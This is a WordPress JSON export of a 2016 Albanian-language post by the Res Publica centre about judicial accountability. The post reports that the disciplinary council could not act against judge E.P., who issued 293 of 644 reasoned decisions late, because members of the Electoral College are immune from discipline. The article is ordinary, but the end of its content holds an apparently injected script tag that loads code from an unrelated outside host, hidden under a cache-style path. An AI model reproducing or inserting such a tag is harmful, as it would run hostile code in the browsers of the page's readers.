{"id":1104,"date":"2016-04-01T19:16:28","date_gmt":"2016-04-01T17:16:28","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=1104"},"modified":"2016-04-01T20:53:25","modified_gmt":"2016-04-01T18:53:25","slug":"gjyqtarja-e-p-vonon-zbardhjen-e-40-te-vendimeve-kld-nuk-e-procedon-sepse-ajo-ka-imunitet-si-anetare-e-kolegjit-zgjedhor","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=1104","title":{"rendered":"Gjyqtarja E.P. vonon zbardhjen e 40% t\u00eb vendimeve. KLD nuk e procedon sepse ajo ka imunitet si an\u00ebtare e Kolegjit Zgjedhor"},"content":{"rendered":"<p><a href=\"http:\/\/www.respublica.org.al\/gjyqtarja-e-p-vonon-zbardhjen-e-40-te-vendimeve-kld-nuk-e-procedon-sepse-ajo-ka-imunitet-si-anetare-e-kolegjit-zgjedhor\/kld\/\" rel=\"attachment wp-att-1105\"><img decoding=\"async\" class=\"alignleft wp-image-1105 size-medium\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2016\/04\/KLD-300x165.jpg\" alt=\"KLD\" width=\"300\" height=\"165\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/04\/KLD-300x165.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2016\/04\/KLD.jpg 640w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>N\u00eb kuad\u00ebr t\u00eb nj\u00eb studimi p\u00ebr shkaqet e pand\u00ebshkueshm\u00ebris\u00eb s\u00eb gjyqtar\u00ebve nga KLD, qendra Res Publica, me mb\u00ebshtetjen e Fondacionit Shoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb ka analizuar veprimtarin\u00eb e KLD-s\u00eb p\u00ebr vitin 2015.<\/p>\n<p>Nj\u00eb nga problemet shqet\u00ebsuese q\u00eb \u00ebsht\u00eb konstatuar edhe nga vet\u00eb KLD gjat\u00eb mbledhjeve t\u00eb saj, \u00ebsht\u00eb pa mund\u00ebsia e procedimit disiplinor ndaj gjyqtar\u00ebve q\u00eb jan\u00eb an\u00ebtar\u00eb t\u00eb Kolegjit Zgjedhor, pasi k\u00ebshtu shprehet neni 149 i Kodit Zgjedhor.<\/p>\n<p>Q\u00ebllimi i dispozit\u00ebs s\u00eb m\u00ebsip\u00ebrme \u00ebsht\u00eb mbrojtja e gjyqtarit nga \u00e7do lloj ndikimi i jasht\u00ebm, por, n\u00eb rastet kur kjo \u201cmbrojtje\u201d kthehet n\u00eb nj\u00eb mund\u00ebsi abuzimi, kjo dispozit\u00eb e humbet q\u00ebllimin e saj. Sipas KLD-s\u00eb, gjyqtarja E.P. ka zbardhur me vones\u00eb \u00a040% t\u00eb vendimeve, nj\u00eb shkelje e r\u00ebnd\u00eb kjo sipas ligjit, q\u00eb pasohet me masa disiplinore. Por, p\u00ebr shkak t\u00eb imunitetit t\u00eb saj, KLD nuk ka mundur t\u00eb marr\u00eb asnj\u00eb mas\u00eb. <a href=\"http:\/\/www.kld.al\/vendime\/2015\/procesverbale-2015\/procesverbal-dat%C3%AB-22-12-2015\">(shih procesverbalin)<\/a><\/p>\n<p>Afati i mandatit t\u00eb an\u00ebtarit t\u00eb Kolegjit Zgjedhor \u00ebsht\u00eb 4 vjet, brenda s\u00eb cil\u00ebs gjyqtar\u00ebt q\u00eb jan\u00eb an\u00ebtar\u00eb t\u00eb k\u00ebtij kolegji, kan\u00eb imunitet ndaj procedimeve disiplinore. Afati maksimal p\u00ebr t\u00eb proceduar p\u00ebr nj\u00eb shkelje t\u00eb kryer nga gjyqtari \u00ebsht\u00eb 5 vjet nga momenti i kryerjes s\u00eb shkeljes. N\u00eb k\u00ebt\u00eb m\u00ebnyr\u00eb, krijohen premisa q\u00eb gjyqtari\u00a0 t\u00eb mos p\u00ebrgjigjet p\u00ebr shkeljet e kryera p\u00ebr nj\u00eb pjes\u00eb t\u00eb mir\u00eb t\u00eb koh\u00ebs, pavar\u00ebsisht sa e r\u00ebnd\u00eb mund t\u00eb jet\u00eb shkelja.<\/p>\n<p>Kryetari i Gjykat\u00ebs s\u00eb Apelit Tiran\u00eb ka informuar periodikisht faktin se q\u00eb nga viti 2012 e deri aktualisht gjyqtarja E.P. p\u00ebrb\u00ebn nj\u00eb rast t\u00eb p\u00ebrs\u00ebritur. Sipas tij, n\u00eb nj\u00eb periudh\u00eb disa vje\u00e7are gjyqtarja ka dh\u00ebn\u00eb 644 vendime gjyq\u00ebsore p\u00ebr \u00e7\u00ebshtjet civile dhe masa sigurimi personal nga t\u00eb cilat 293 vendime civile jan\u00eb arsyetuar dhe dor\u00ebzuar p\u00ebrtej afatit ligjor. Arsyetimi me vones\u00eb sjell pasoj\u00ebn q\u00eb pal\u00ebt nuk mund t\u00eb ankohen sepse nuk din\u00eb p\u00ebrmbajtjen e vendimit, pavar\u00ebsisht se mund t\u00eb kalojn\u00eb afatet e ankimit.<\/p>\n<p>Kjo \u00ebsht\u00eb paraqitur si nj\u00eb \u00e7\u00ebshtje shqet\u00ebsuese jo vet\u00ebm n\u00eb opinionin e KLD-s\u00eb, por edhe tonin. N\u00eb lidhje me sa m\u00eb sip\u00ebr, nj\u00eb nga sfidat q\u00eb Reforma n\u00eb Drejt\u00ebsi duhet t\u00eb zgjidh\u00eb \u00ebsht\u00eb edhe rishikimi i imunitetit q\u00eb kan\u00eb an\u00ebtar\u00ebt e Kolegjit Zgjedhor, duke p\u00ebrfshir\u00eb n\u00eb m\u00ebnyr\u00eb specifike rastet dhe m\u00ebnyr\u00ebn e procedimit t\u00eb tyre, n\u00eb nj\u00eb m\u00ebnyr\u00eb t\u00eb p\u00ebrshtatshme, p\u00ebr t\u00eb mos i l\u00ebn\u00eb ata t\u00ebr\u00ebsisht t\u00eb lir\u00eb t\u00eb cenojn\u00eb t\u00eb drejtat kushtetuese t\u00eb pal\u00ebve n\u00eb proces.<\/p>\n<p><em>Res Publica<\/em><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00eb kuad\u00ebr t\u00eb nj\u00eb studimi p\u00ebr shkaqet e pand\u00ebshkueshm\u00ebris\u00eb s\u00eb gjyqtar\u00ebve nga KLD, qendra Res Publica, me mb\u00ebshtetjen e Fondacionit [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1105,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1104"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1104"}],"version-history":[{"count":4,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1104\/revisions"}],"predecessor-version":[{"id":1110,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/1104\/revisions\/1110"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/1105"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1104"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1104"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}